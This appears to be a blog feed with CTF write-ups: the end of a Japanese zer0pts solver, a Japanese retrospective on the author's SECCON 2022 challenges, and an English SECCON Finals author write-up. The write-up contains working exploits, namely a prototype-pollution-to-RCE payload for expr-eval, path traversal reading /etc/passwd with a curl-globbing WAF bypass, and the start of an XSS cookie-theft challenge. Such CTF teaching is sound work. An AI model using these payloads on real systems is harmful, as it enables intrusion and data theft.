    return res.json()


uuid1 = create_note("x", "x")

uuid2 = create_note("x", "x")
update_note(uuid2, {"headers[Content-Type]": "text/plain", "headers[X-HTTP-Method-Override]": "PUT", "title[x]": "", "content[x]": "", "like[x]": ""})

# botにいいねしてもらうpostのURL
print(f"{FRONTEND_BASE_URL}/#page=post&id={uuid1}")

# reportする文字列
print(f"{urllib.parse.quote(uuid1+'?title=x&content=x&permission[flag]=1#')},{uuid2},__proto__")

# report後にアクセスするURL
print(f"{API_BASE_URL}/api/post/{uuid1}/has_enough_permission_to_get_the_flag")
# -> {"flag":"zer0pts{tan_takatatontan_ton_takatatantatotan_8jOQmPx2Mjk}"}

フラグ

zer0pts{tan_takatatontan_ton_takatatantatotan_8jOQmPx2Mjk}

感想

X-HTTP-Method-Overrideに気づくのに時間がかかってしまった。謎リクエストヘッダ問はたまに遭遇するけど、毎回気づくのに時間がかかってどうにかしたいです。というか、Webフレームワークにデフォルトで謎機能を有効にするのはやめてほしいというのが正直な気持ちです5

問題自体はおもしろかったです。prototype pollutionパズルでPUT /api/post/:idを利用し、リクエストメソッドの上書き先で再びPUT /api/post/:idを利用する点は、伏線回収みたいで問題の構成がきれいで良かったです。

Footnotes

  1. 一方で、ひとりでもくもくと問題に挑んでフラグを取りに行くのも達成感があって気持ちが良いので、どちらが良いかは微妙なところ。

  2. writeupを書いてる途中で気づいたんですが、warmup profileでなくてwarmuprofileだったのか。文字遊び好きです。

  3. 作問者writeupによれば、2つセッションつくるのが想定だったみたいです。たしかに。

  4. レスポンス内容の差異がなかったとしてもtime-basedなオラクルはたぶん構成可能です。やりたくなかったので、親切設計でありがたかったです。

  5. 歴史的経緯・慣習的なものなので必要という側面もあるかもしれないですが、それはそれとして。

]]> CTF <![CDATA[CTF作問感想 - 2022]]> https://blog.arkark.dev/2023/03/09/my-ctf-challs-2022 https://blog.arkark.dev/2023/03/09/my-ctf-challs-2022 Thu, 09 Mar 2023 00:00:00 GMT 2022年につくった各問題の作問感想や背景の話です1。writeupではありません。 非常に遅くなってしまったし、そもそも需要はあるのだろうか...🤔

2022年は全部で14問つくりました(web:11, misc:3)2:

  • SECCON CTF 2022 Quals:
    • [web] skipinx
    • [web] easylfi
    • [web] bffcalc
    • [web] piyosay
    • [web] denobox
    • [web] spanote
    • [misc] latexipy
    • [misc] txtchecker
    • [misc] noiseccon
  • SECCON CTF 2022 Finals:
    • [web] babybox
    • [web] easylfi2
    • [web] MaaS
    • [web] light-note
    • [web] dark-note

なお、以下では問題のネタバレを多分に含むので注意してください。問題のソースコードやwriteupはこちらにまとめてます:

また、作問する上で参考にした問題や影響元になっている問題も謝辞の意味合いを込めて載せました。どれも好きな問題なので興味があればそちらもぜひ。

[web] skipinx

「simplewaf - corCTF 2022」の問題に出会い、自分も同じような問題をつくりたいと思ってました。そこで以下を満たす問題をwarmupに配置することを目指しました:

  • とにかく短いソースコード
  • 初心者でも解くことが可能だが、上級者にとっても自明でない3
  • 解法が非常にシンプル

今のところ自明と言っている人は観測しておらず、また、序盤はwarmupなのにあまり解かれず徐々にsolvesが増えていき最終的に100solves程度になったので目的は達成できてそうで良かったです。

ところで、この問題の設定は「nginxの処理をskipさせたらフラグを入手できる」というものでした。問題名はskip+nginxを略してskipinx、読み方はnginxの音に引っ張られるため「スキッピンエックス」です。正解した人はいましたか?

関連問題

[web] easylfi

curlのURL globbingでパズルがつくれるなと思ってつくった問題がこれです。

LFI自体は簡単(なので問題名がeasylfi)ですが、WAFを突破するための一癖あるパズルが待ち構えているという形式の問題でした。「あること」に気づく必要があり、「あっ!」と気づいてもらえることを期待しています。

実質パズルゲームなので邪魔にならず問題に集中できるレベルの「誘導」を設けて、レベルデザインに気をつけて設計しました。

この問題については特に多くのポジティブな感想をいただきました。ありがとうございます。

[web] bffcalc

HTTP Request SmugglingやHTTP Response SplittingのようなHTTPを改竄する系の攻撃を行う問題をつくりたかったという背景がありました。ただ、一般的なソフトウェアやライブラリはこの手の攻撃に対する対策をすでに実施済みで4、自然な問題設定として出題するのが難しかったです。

HTTP Response Splittingについては「Sticky Notes - Circle City Con 2021」で過去に出会ったことがあり、よくできていた問題だったので参考にしました。

最終的に、XSSを攻撃の起点として、HTTP Request Splittingで本来アクセス不可能なHttpOnlyなクッキーを奪取するという問題になりました。この形式の問題は出会ったことがないので珍しいと思ってます。

関連問題

  • Sticky Notes - Circle City Con 20215

[web] piyosay

狂ったパズルを1問置きたくて、つくった問題がこれです。

Baba Is You、Induction、The Witnessなどのパズルゲームが好きな人にはぜひやってもらいたい問題です。

残念なことに非想定解が2つあり、観測範囲では想定解で解かれなかったので泣いています。DOMPurify.removedにどうして気づかなかったんだ...非常に悔やんでます。cross-siteのiframeを使った解法も非想定です😇

ちなみに、RegExp.inputの機能は「no-cookies - DiceCTF 2022」の非想定解法writeupで知りました。どうしてこんな機能があるんだ...と思いつつCTF的にはおもしろいおもちゃなので、使わない手はありません。ただし、知識ゲーにはしたくないとおもっていて、ソースコード中の

// Delete a secret in RegExp
"".match(/^$/);

は知らない人向けのヒントも兼ねてました。RegExp.inputを知らなかった人は「この処理はなんだ?」と思って調べてもらうというのを期待しています。今後はCTFでの典型になるかもしれないです。

あと、piyosayの問題名はcowsayから来ています。見た目もこだわりました:

piyoの絵文字を決める†アルゴリズム†:

get("piyo").innerHTML = "🐥/🐣/🐤".split("/")[(Math.random()*3)|0];

リロードすると3つの中からどれかが選ばれます。

関連問題

[web] denobox

Rust + Deno + SWC の今どきな人が好きそうな欲張り3点セットです。でも本質的に関係あるのはDenoだけでした。もしRustで期待していた人がいたらすみません。

問題名通りDeno sandbox問です。Deno特有の機能をつかってなにかできないかな〜とドキュメントを眺めながら考えてたらできました。また、既存のDeno問はあまり把握してないのですが、「denoblog - DiceCTF 2022」がとてもおもしろくておすすめです。

あと、作問にあたっていい感じのバリデーションを設けたかったのですが、「Treebox - Google CTF 2022」にあったASTをtraverseして制限する方法が非想定を出しにくくちょうどよかったのでまねしました。でも、結局非想定が出てしまったのでおしまいです。この問題は1 solvesで、その1が非想定でした😇 HELP!

想定解はかなり独自性があって自信作です。

関連問題

[web] spanote

1問くらいsolves想定が0~1の問題がほしいなと思ってつくった問題です。

Google Chromeのあまり知られていないキャッシュの挙動を知っている(あるいは実験で気づく)必要があり、また、XSSとしてその挙動を悪用する方法はおそらく新規性のあるものなのでかなりむずかしい想定です。自分も最初はキャッシュ機構についてそんなに詳しくはなかったため、問題作成にあたって、各資料を漁ったりchromeのソースコードを読んだりと色々苦労しました。

最終的に(おそらく)新しいXSS手法に落ち着いたので、これをうまくシンプルなノートアプリケーションに問題として落とし込むようにがんばりました。思いついた手法をどこかしらで発表するのもありだったかもしれないです。

最悪誰にも解かれないんじゃないかと予想してましたが、終盤ギリギリで1チームに解かれてしまい、しかも想定解通りだったので感動しています。

ちなみに理解するにあたって、日本語記事では以下が詳しいです。ただし、現在のchromeはデフォルトでbfcacheに対応しているという違いがあるという点は注意してください:

このような、ブラウザの実装依存だったり時代とともに変わる挙動だったりが関係する問題は難しい傾向があるという認識です。でも、webといえばブラウザなので、こういう問題が特にwebらしい問題だと思っています。

[misc] latexipy

みんな大好きpyjail問です。

magic commentを使ってエンコーディングの解釈の差異を利用したbypassを行います。想定はUTF-7を使っていて、人によってはなつかしさを感じたのではないでしょうか?

解法は単純で多くの人に解かれるだろうと予想していましたが、最終的に8 solvesと少なくて予想外でした。現代ではこの手のエンコーディングに関する問題が発生しにくくなってきている傾向があるので意外と盲点だったのかもしれません。いや、latexifyへの誤誘導が意地悪すぎました。すみません。反省はしてません。

作問の形式や非想定潰しに関しては「Treebox - Google CTF 2022」と「not a pyjail - DownUnderCTF 2022」が大いに参考になりました。

spec = util.spec_from_file_location("tmp", file.name)
spec.loader.exec_module(util.module_from_spec(spec))

で奇妙なロードの仕方をしているのは、not a pyjailの解を避けるためでした。

関連問題

[misc] txtchecker

みんな大好きReDoS問です。

fileコマンドのmagic fileへのinjectionによる問題をつくりたいなと思ってつくった問題です。 blind SQLiならぬblind magic file injectionです。

問題ファイルが

#!/bin/bash

read -p "Input a file path: " filepath
file $filepath 2>/dev/null | grep -q "ASCII text" 2>/dev/null

# TODO: print the result the above command.
#   $? == 0 -> It's a text file.
#   $? != 0 -> It's not a text file.
exit 0

で、本質的な行が3行という究極的にシンプルな問題になったと思っていて、勝手に満足しています。

何も出力が得られず、得られるものは実行時間くらいなので、time-basedなオラクル作成 → ReDoS?というメタ読みが経験豊富なCTFプレイヤにとってはすぐだったかもしれないです。ただし、この手の問題はsolver作成に骨が折れるというのが定説で、実際に作問者の私も確実に動くsolverを実装するのに手間取りました。

ところで想定解の最初のステップの、fileコマンドの引数で/dev/tty/proc/self/fd/0を使うことで任意の内容を書き込めるようにするというのは「what is include? - KosenXmasCTF」がアイデア元になっています。misc問で特に好きな問題の一つです。

関連問題

[misc] noiseccon

多くのCTFプレイヤにとってはおそらく馴染みのないパーリンノイズに関する問題です。

パーリンノイズというのは、CGやクリエイティブコーディング界隈では比較的有名な古典的ノイズ生成手法です。ノイズに関しては奥が深く私はエキスパートというわけではないですが、日本語資料だと以下の本がわかりやすくておすすめです:

CTFのmisc問では、(コンピュータサイエンス内ではあるが)全く他分野の技術/理論が絡む問題が稀によく出されます。そのような問題が多いと微妙なCTFになってしまいますが、1,2問CTFに混ざっているのは異種格闘CTFみたいで好きなので、今回出題してみました。

想定では、パーリンノイズの実装(または理論)からアルゴリズムの性質を考察し、そこからcrypto的な思考でオラクルを構成してフラグの各ビットを特定するというものでした。brute forceで解いたチームが複数あったようなので悲しいです。ただ、完全に想定通りな解法で解かれているのは見かけてはいませんが、本質的(間接的)には想定解で用いた性質を利用してオラクルしているものがあったので、うれしかったです。

[web] babybox

JavaScript sandbox問です。

野生のおもしろJavaScript sandboxが遊べるライブラリがないかな〜と漁っていたらたまたま見つけて、色々いじったらprototype pollution to RCEができ、そのやり方がJavaScript特有のパズル要素があっておもしろかったのでそのまま問題として出題しちゃいました。

sandbox系は色々な解法が出がちで、この問題では非想定を歓迎していました。実際、prototype pollutionを使わずに解いている人もいておもしろかったです。

なお、この問題はライブラリの脆弱性を使ったものなので本来は出題せずに報告するべきものでしたが、issueやPRを見るとどうやらすでに報告済みで修正されていました。ただし、なぜかnpmへは修正済みの内容がpublishされておらず数年間放置されており、また、報告されている脆弱性はprototype pollution止まりだったため、問題として出してもよいだろうと判断しました。

sandbox問としてはおもしろいと思うのですが、issueに気づくか気づかないかで解くスピードに差が出てしまうので、その点だけが気に入っておらず6、悔やんでます。

[web] easylfi2

easylfiではテンプレートエンジンがあったからWAFのbypassができたのに、まさかのそのテンプレートエンジンが消えた上でなおWAFが健在しています。不可能では???を第一印象に抱いてもらえたら大成功です。

ぱっと見easylfiの上位互換の問題に見えるが実はそうではないという問題でした。

予選の段階ではeasylfi2の問題案はまったく思いついておらず名前は完全に後付けです。後述のdark-noteの問題を作成中にバグではまってたのですが、その原因がstdoutの詰まりでした。せっかくなので問題にできないか考えたところ、予選で出題したeasylfiの続編としてちょうどよい構成を思いついたので出題に至りました。

[web] MaaS

この問題は攻撃フェイズが2段階あり、1段階目はform submitの挙動を突いてbypassする、2段階目はパズルでCSP bypassをするという構成になっています。

1段階目で関係するのはnewline normalizationというものです。これはブラウザに実装されているform submit時に\n\r\nに変換される挙動(仕様?)を指します。これによって送信前と送信後で文字数が変化するので攻撃に利用できるという想定でした。ガチャガチャ実験すると偶然見つけてしまう可能性が高かったため、minifierによって\nを潰しやすくして、ついでにMinifier as a Serviceというそれっぽいwebサービスにしました。

newline normalizationを利用したCTFの問題は今まで見たことがないので初出だと思っています。web開発者ならこの挙動に苦しんだ人もいるかもしれません。どの程度知名度があるものなのか知らなかったので難易度想定が難しく、簡単すぎたらどうしようと不安になっておまけで後半に雑にパズルを設置しました。感想を聞く限りこのパズルが曲者だったようです。すみません(?)

writeupでパズルの解説もしたかったですが、実際解説しようとすると狂いそうになったので適当にごまかしました。

[web] light-note

0 solvesその1です。どうして...

ブラウザの新しい機能に関係する問題を1問混ぜたいというモチベーションで作問を始めました。案としてはSanitizer API、Import Maps、Trusted Typesあたりが浮上しました。

最終的にはSanitizer APIとImport Mapsを用いた以下のwrite関数をDOM Clobberingだけで壊すという至極シンプルな問題に落ち着きました:

const write = async (element, input) => {
  try {
    element.setHTML(input, {
      sanitizer: new Sanitizer({ dropElements: ["link", "style"] })
    });
  } catch (e) {
    await import("DOMPurify").then(({ default: DOMPurify }) => {
      // fallback: Firefox does not support Sanitizer API yet.
      element.innerHTML = DOMPurify.sanitize(input);
    }).catch((e) => {
      // fallback: Safari does not support import maps :(
      element.innerHTML = input.replace(/[<>'"&]/, "");
    });
  }
};

新しい機能はブラウザによって対応状況が異なるので、FirefoxとSafari向けのfallbackを用意したという体の問題になっています。それっぽくコメントを付けてますが、実際にSafariで2つ目のfallback先に遷移するのかは試してません。

DOM Clobberingパズル設計については「Simple Blog - zer0pts CTF 2021」「modernblog - corCTF 2022」あたりから色々学んでから取り掛かりました。

また、単純にDOM Clobberingするだけだとおもしろみがないので、「nested forms回避」というひと捻りを加えてみました。参加者の感想を聞く限り、この回避方法を思いつくことに苦戦していた人が多いようで7、作問者としてはしてやったりになってます。

ところでSanitizer APIについては、DOMPurifyと同様の用途でセキュリティ対策として使えるかどうかという観点でも探っていました。仕様書にもあるようにSanitizer APIには対策を想定していない攻撃シナリオが複数存在します8。mXSS対策に親和性があるのは魅力的ですが、効果的にセキュリティ対策として利用するには適切な設定を行う必要があり、ある程度の知識・経験を要求することから、安易にDOMPurifyの代替として勧めるのはよくなさそうだなと感じました。一方で、使用目的が明確なときは適切な設定と利用方法を行うことで強力な武器(というか盾)になりうり、また、外部ライブラリに頼らないブラウザネイティブのAPIとしての存在意義があり、今後の動向が気になるところです。

関連問題

[web] dark-note

0 solvesその2です。どうして...

決勝のために作成したボス問です。作問余力が足りなくて予選のボス問ほど難しい問題にはならなかったですが、ヘビーな問題ではあったと思います。

最初は一風変わったXS-Leakの問題をつくろうと検討していたのですが、クライアント上でのリークではなくサーバ上でのリークにするとおもしろいのではないか?と思い、最終的にテンプレートエンジンでのキャッシュの有無によるレンダリング速度の差異でオラクルをする問題になりました。

webをある程度やっているCTFプレイヤであれば、解法のコンセプトを理解することは比較的簡単で問題自体も簡単そうに見えると思います。一方で、実際にオラクルを構成するには色々と工夫するポイントが多くありひらめきやセンスを要求するという点で難しいという想定です。exploitの実装においても、botに対してCSRFを仕掛けてキャッシュを汚染するフェイズと直接サーバにリクエストを送ってキャッシュの有無からリークするフェイズがあり、割と複雑です。

また、light-note/dark-noteで問題名が似ていますが、実は実装も似せているため、差分を取ることによってある程度時短できるようにしていました。というのも、ソースコードを理解する時間よりも問題の本質部分に取り掛かる時間を多くとってほしかったためです。

ちなみに、テンプレートエンジンのキャッシュを利用した問題は「Panda Memo - CakeCTF 2022」があります。"mustache" ctfなどで検索するとこの問題がヒットしてしまうので、キャッシュを利用することがすぐにバレないようにmustacheではなくHogan.jsを使ってました。

関連問題

まとめ

こうしてみると、自分の作問は過去に解いたCTFの問題から多くの影響を受けているなと感じました。普段はたのしくて創造的な問題を遊ばせてもらっている立場なので、逆に提供する側になってCTF界隈に還元できていたらうれしいです。

また、参加者のwriteupはうれしすぎて何度も読んでいます。大感謝です。

Footnotes

  1. 自分が出題されて楽しいと思える問題を提供したい気持ちがあるので、基本的にはどの問題にも愛着があり話したい裏話もあります。が、writeupに載せても興味ない人にとっては雑音でしかなく、また、自己満足な側面も大きいので別記事としてここにまとめようというスタンスです。

  2. SECCON CTFしかなくてちょっとさみしい。意外と自分は問題をつくるのがすきなことに気づいたので最近は作問意欲が結構あります。web問で良ければぜひCTF運営に誘ってください。作問ストックが毎回空になってるのでつくれる保証はないですが...。

  3. これはTSG CTFにおけるbeginner問の考えに感化されている部分が大きいです(参考 >「Beginner問題の整備」)。ところでTSG CTFというCTFが大好きで開催を待ち望んでいます🙏

  4. 逆に対策されてなかったらそれは0 dayなので報告するべきで、結局出題はできないです9

  5. CTF開催後に公式リポジトリが公開されていたのですが、あるときに消されてアクセスできなくなっていました。大人の事情があったのかもしれないけど非常に残念😭

  6. ライブラリやフレームワークの脆弱性をissueやPR等で探して、そこを取っ掛かりにして解く問題は世の中にたくさんありますが、自分はその手の問題があまり好きではないです。個人的には、CTFの問題では既知脆弱性探しはさせずに、自力で脆弱性を見つけてゴール(フラグ)までの道筋を見つけて攻撃する、その過程の楽しさに主眼を置きたい気持ちがあります。

  7. 作問者とは違い、解く人はこれが想定解という確信がないので余計にむずかしいという要因があります。

  8. これは機能の存在理由や責任の所在等に依るものなので、Sanitizer APIが悪いということを意味しません。

  9. CTFで0 day出すのは本当にやめてほしいです。

]]> Diary <![CDATA[SECCON CTF 2022 Finals: Author writeups]]> https://blog.arkark.dev/2023/02/17/seccon-finals https://blog.arkark.dev/2023/02/17/seccon-finals Fri, 17 Feb 2023 00:00:00 GMT I wrote all the web challenges in SECCON CTF 2022 Finals, following the Quals round. Thank you for participating in the CTF and I was glad to receive positive feedback at the after-party and on Twitter/Discord.

In this post, I describe my solution for the following challenges:

ChallengeCategoryIntended
Difficulty		Score
(static)		Solved / 10
(Internatinal)		Solved / 12
(Domestic)
babyboxwebwarmup10064
easylfi2webeasy200108
MaaSwebmedium30031
light-notewebmedium30000
dark-notewebhard50000

I added the source code and author's solvers to my-ctf-challenges repository.

[web 100] babybox

Description:

Can you hack this sandbox?

  • http://babybox.{int,dom}.seccon.games:3000

Overview

The server-side source code is very simple:

const fastify = require("fastify")();
const fs = require("node:fs").promises;
const execFile = require("util").promisify(require("child_process").execFile);

const PORT = process.env.PORT ?? "3000";

fastify.get("/", async (req, reply) => {
  const html = await fs.readFile("index.html");
  return reply.type("text/html; charset=utf-8").send(html);
});

fastify.post("/calc", async (req, reply) => {
  const { expr } = req.body;
  try {
    const result = await execFile("node", ["./calc.js", expr.toString()], {
      timeout: 1000,
    });
    return result.stdout;
  } catch (err) {
    return reply.code(500).send(err.killed ? "Timeout" : err);
  }
});

fastify.listen({ port: PORT, host: "0.0.0.0" });

In POST /calc, the server executes calc.js as a subprocess with a parameter expr and returns the result. The implementation of calc.js is as follows:

const { Parser } = require("expr-eval");

const expr = process.argv[2].trim();
console.log(new Parser().evaluate(expr));

This is also simple.

As you can see from Dockerfile, the file name of a flag is unknown:

FROM node:19.6.0-slim
ENV NODE_ENV=production
WORKDIR /app

COPY ["package.json", "package-lock.json", "./"]
RUN npm install --omit=dev
COPY . .
RUN mv flag.txt /flag-$(md5sum flag.txt | cut -c-32).txt

USER 404:404

CMD ["node", "index.js"]

Thus, this is a JavaScript sandbox challenge and the goal is RCE.

Solution

The server uses the latest of expr-eval, so is this challenge a 0-day RCE?

No.

You can find this open issue from the repository in GitHub. According to this, the latest version (published to npm) has a vulnerability although it was already patched on the latest commit. The vulnerability is Prototype Pollution:

So, what you should do is "Prototype Pollution to RCE"1.

For this type of JavaScript sandbox challenges, it's often important to somehow obtain eval or Function.prototype.constructor to RCE.

In REPL of Node.js, I tried many things and found the following useful behavior:

> Object.getPrototypeOf(toString) === Function.prototype
true
> Object.getOwnPropertyDescriptor(Object.getPrototypeOf(toString), "constructor")
{
  value: [Function: Function],
  writable: true,
  enumerable: false,
  configurable: true
}
> Object.getOwnPropertyDescriptor(Object.getPrototypeOf(toString), "constructor").value === Function.prototype.constructor
true
> value
Uncaught ReferenceError: value is not defined
> Object.assign(__proto__, Object.getOwnPropertyDescriptor(Object.getPrototypeOf(toString), "constructor"))
{
  value: [Function: Function],
  writable: true,
  enumerable: false,
  configurable: true
}
> value
[Function: Function]
> value("console.log('polluted!!')")()
polluted!!
undefined

The code is polluting value to Function.prototype.constructor. Finally, my expr is:

o = constructor;
o.assign(__proto__, o.getOwnPropertyDescriptor(o.getPrototypeOf(toString), "constructor"));
f = value("return global.process.mainModule.constructor._load(`child_process`).execSync(`id`).toString()");
f()

Got a RCE!

Solver

import os
import httpx

BASE_URL = f"http://{os.getenv('SECCON_HOST')}:{os.getenv('SECCON_PORT')}"


def evaluate(command: str) -> str:
    res = httpx.post(
        f"{BASE_URL}/calc",
        json={
            "expr": f'o = constructor; o.assign(__proto__, o.getOwnPropertyDescriptor(o.getPrototypeOf(toString), "constructor")); f = value("return global.process.mainModule.constructor._load(`child_process`).execSync(`{command}`).toString()"); f()'
        },
    )
    return res.text


files = evaluate("ls /").splitlines()
for file in files:
    if file.startswith("flag-"):
        print(evaluate(f"cat /{file}"))

Flag

SECCON{pr0totyp3_po11ution_iS_my_friend}

[web 200] easylfi2

Description:

easylfi again! I know you fully understand everything about curl.

  • http://easylfi2.{int,dom}.seccon.games:3000

Overview

The server-side code is as follows:

const app = new (require("koa"))();
const execFile = require("util").promisify(require("child_process").execFile);

const PORT = process.env.PORT ?? "3000";

// WAF
app.use(async (ctx, next) => {
  await next();
  if (JSON.stringify(ctx.body).match(/SECCON{\w+}/)) {
    ctx.body = "🤔";
  }
});

app.use(async (ctx) => {
  const path = decodeURI(ctx.path.slice(1)) || "index.html";
  try {
    const proc = await execFile(
      "curl",
      [`file://${process.cwd()}/public/${path}`],
      { timeout: 1000 }
    );
    ctx.type = "text/html; charset=utf-8";
    ctx.body = proc.stdout;
  } catch (err) {
    ctx.body = err;
  }
});

app.listen(PORT);

It is obviously vulnerable for path traversal.

$ http --path-as-is "http://localhost:3000/../../../../etc/passwd"
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 961
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Feb 2023 16:49:50 GMT
Keep-Alive: timeout=5

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
... snip ...

However, the WAF disallows responses including a flag.

$ http --path-as-is "http://localhost:3000/../../../../flag.txt"
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 4
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Feb 2023 16:52:27 GMT
Keep-Alive: timeout=5

🤔

The goal in this challenge is bypassing the WAF.

Solution

// WAF
app.use(async (ctx, next) => {
  await next();
  if (JSON.stringify(ctx.body).match(/SECCON{\w+}/)) {
    ctx.body = "🤔";
  }
});

In this part, why is JSON.stringify used? Are there cases that ctx.body is not string?

Yes.

If a subprocess causes an error, ctx.body becames the error object:

  } catch (err) {
    ctx.body = err;
  }

E.g.:

$ http --path-as-is "http://localhost:3000/aaa"
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 147
Content-Type: application/json; charset=utf-8
Date: Tue, 14 Feb 2023 17:04:58 GMT
Keep-Alive: timeout=5

{
    "cmd": "curl file:///app/public/aaa",
    "code": 37,
    "killed": false,
    "signal": null,
    "stderr": "curl: (37) Couldn't open file /app/public/aaa\n",
    "stdout": ""
}

If you can cause an error including a substring of a flag so that it don't match with /SECCON{\w+}/, you can avoid the WAF and get the substring in the response body.

Here, you need one idea: what would happen if the stdout of a subprocess is very very very large?

$ http --path-as-is "http://localhost:3000/../../../../bin/bash"
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 2320247
Content-Type: application/json; charset=utf-8
Date: Tue, 14 Feb 2023 17:12:31 GMT
Keep-Alive: timeout=5

{
    "cmd": "curl file:///app/public/../../../../bin/bash",
    "code": "ERR_CHILD_PROCESS_STDIO_MAXBUFFER",
    "stderr": "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0",
    "stdout": "ELF\u0002\u0001\u0001\u0000\u0000\u0000...snip..."
}

It causes an error and the stdout of the error object is a prefix of the file content.

Noje.js docs says the following for maxBuffer option of execFile:

maxBuffer <number>: Largest amount of data in bytes allowed on stdout or stderr. If exceeded, the child process is terminated and any output is truncated. See caveat at maxBuffer and Unicode. Default: 1024 * 1024.

So, with this specification, making "SECCON{...}".slice(0, -1) as a result of curl execution is to steal a flag. In fact, it is possible using URL globbing of curl. See the following Solver section.

Solver

import os
import re
import subprocess

BASE_URL = f"http://{os.getenv('SECCON_HOST')}:{os.getenv('SECCON_PORT')}"


def curl(files: list[str]) -> bytes:
    proc = subprocess.run(
        [
            "curl",
            "--globoff",
            "--path-as-is",
            BASE_URL + "/../../{" + ",".join(files) + "}",
        ],
        capture_output=True
    )
    assert proc.returncode == 0
    return proc.stdout


files = [
    "bin/tar",
    "bin/sed",
    "bin/gunzip",
    "app/package.json",
    "app/package.json",
    "app/package.json",
    "app/package.json",
    "app/package.json",
]

assert len(curl(files)) < 1024 * 1024
assert len(curl(files)) == 1048467

for i in range(1000):
    flag_file = "/"*i + "flag.txt"
    stdout = curl(files + [flag_file]).decode()
    if stdout == "🤔":
        continue
    else:
        print(f"{i = }")
        print(re.search(r"SECCON{\w+", stdout).group(0) + "}")
        exit(0)
print("Failed")

Flag

SECCON{Wha7_files_did_you_use_to_s0lve_1t}

[web 300] MaaS

Description:

Minifier as a Service

  • http://maas.{int,dom}.seccon.games:3000

Overview

If you post a JavaScript code, you will get a minified code and the compression rate:

Also, you can report a JavaScript code to a bot, then the bot submits the given code on the web service.

The bot program is as follows:

const visit = async (code) => {
  console.log(`start: ${JSON.stringify(code)}`);
  const url = `http://${APP_HOST}:${APP_PORT}`;

  const browser = await puppeteer.launch({
    headless: false,
    executablePath: "/usr/bin/google-chrome-stable",
    args: ["--no-sandbox"],
  });
  const context = await browser.createIncognitoBrowserContext();

  const page = await context.newPage();
  await page.setCookie({
    name: "FLAG",
    value: FLAG,
    domain: APP_HOST,
    path: "/",
  });

  try {
    await page.goto(url, { timeout: 1000 });
    await sleep(1 * 1000);
    await page.waitForSelector("#originalCode");
    await page.type("#originalCode", code);
    await page.waitForSelector("#minify");
    await page.click("#minify");
    await sleep(10 * 1000);
  } catch (e) {
    console.log(e);
  }
  await page.close();

  await context.close();
  await browser.close();

  console.log(`end: ${JSON.stringify(code)}`);
};

The goal is to get the flag cookie of the bot by XSS.

Solution

Step 1: Newline normalizations in form submissions

The implementation of the form submission is as follows:

<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <link rel="stylesheet" href="https://unpkg.com/simpledotcss/simple.min.css">
  <title>MaaS</title>
  <script src="https://cdn.jsdelivr.net/npm/terser/dist/bundle.min.js"></script>
</head>
<body>
  <h1>Minifier as a Service</h1>
  <p>Your JavaScript program:</p>
  <form id="form" method="post" action="/post">
    <textarea id="originalCode" rows="5" placeholder="const ans = (1 + 2 + 3) * 7;&#10;alert(ans);"></textarea>
    <textarea id="minifiedCode" name="minifiedCode" style="display:none;"></textarea>
    <input type="hidden" id="originalLength" name="originalLength"></input>
    <input type="hidden" id="minifiedLength" name="minifiedLength"></input>
    <div style="display: flex; justify-content: space-between;">
      <button id="minify" type="submit">Minify</button>
      <button id="report" type="button">Report</button>
    </div>
  </form>
  <script>
    form.addEventListener("submit", (event) => {
      const elements = event.target.elements;
      const originalCode = elements.originalCode.value;

      Terser.minify(originalCode)
        .then(({ code: minifiedCode }) => {
          elements.minifiedCode.value = minifiedCode;
          elements.originalLength.value = originalCode.length;
          elements.minifiedLength.value = minifiedCode.length;
          form.submit();
        })
        .catch((err) => {
          alert(`Failed to minify the code:\n${err}`);
        });

      event.preventDefault();
    });

    /* snip */
  </script>
</body>
</html>

Your code is minified with terser and the following values are sent to POST /post:

  • minifiedCode: the string of the minified code
  • originalLength: the length of the original code
  • minifiedLength: the length of the minified code

Then, the server processes them as follows:

const escapeHtml = (unsafeStr, offset1, length1, offset2, length2) => {
  return (
    unsafeStr.substring(0, offset1) +
    unsafeStr
      .substring(offset1, offset1 + length1)
      .replaceAll("&", "&amp;")
      .replaceAll("<", "&lt;")
      .replaceAll(">", "&gt;")
      .replaceAll('"', "&quot;")
      .replaceAll("'", "&#039;") +
    unsafeStr.substring(offset1 + length1, offset2) +
    unsafeStr
      .substring(offset2, offset2 + length2)
      .replaceAll("&", "&amp;")
      .replaceAll("<", "&lt;")
      .replaceAll(">", "&gt;")
      .replaceAll('"', "&quot;")
      .replaceAll("'", "&#039;") +
    unsafeStr.substring(offset2 + length2)
  );
};

fastify.post("/post", async (req, reply) => {
  const nonce = crypto.randomBytes(16).toString("base64");

  const originalLength = parseInt(req.body.originalLength);
  const minifiedLength = parseInt(req.body.minifiedLength);
  const minifiedCode = req.body.minifiedCode;

  const templateHtml = (await fs.readFile("views/result.html"))
    .toString()
    .replaceAll("{{CSP_NONCE}}", nonce)
    .replaceAll("{{ORIGINAL_LENGTH}}", originalLength)
    .replaceAll("{{MINIFIED_LENGTH}}", minifiedLength);
  const html = templateHtml.replaceAll("{{MINIFIED_CODE}}", minifiedCode);

  return reply.type("text/html; charset=utf-8").send(
    escapeHtml(
      html,

      // (offset, length) of the first {{MINIFIED_CODE}}:
      templateHtml.indexOf("{{MINIFIED_CODE}}"),
      minifiedLength,

      // (offset, length) of the second {{MINIFIED_CODE}}:
      templateHtml.lastIndexOf("{{MINIFIED_CODE}}") +
        (minifiedLength - "{{MINIFIED_CODE}}".length),
      minifiedLength
    )
  );
});
views/result.html
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta
    content="default-src 'self'; base-uri 'none'; object-src 'none'; style-src https://unpkg.com/simpledotcss/simple.min.css; script-src 'nonce-{{CSP_NONCE}}'"
    http-equiv="Content-Security-Policy"
  >
  <link rel="stylesheet" href="https://unpkg.com/simpledotcss/simple.min.css">
  <title>MaaS</title>
</head>
<body>
  <h1>Minifier as a Service</h1>
  <p>Result:</p>
  <pre><code>{{MINIFIED_CODE}}</code></pre>
  <p>Compression rate: <span id="compressionRate"></span></p>
  <script nonce="{{CSP_NONCE}}">
    (() => {
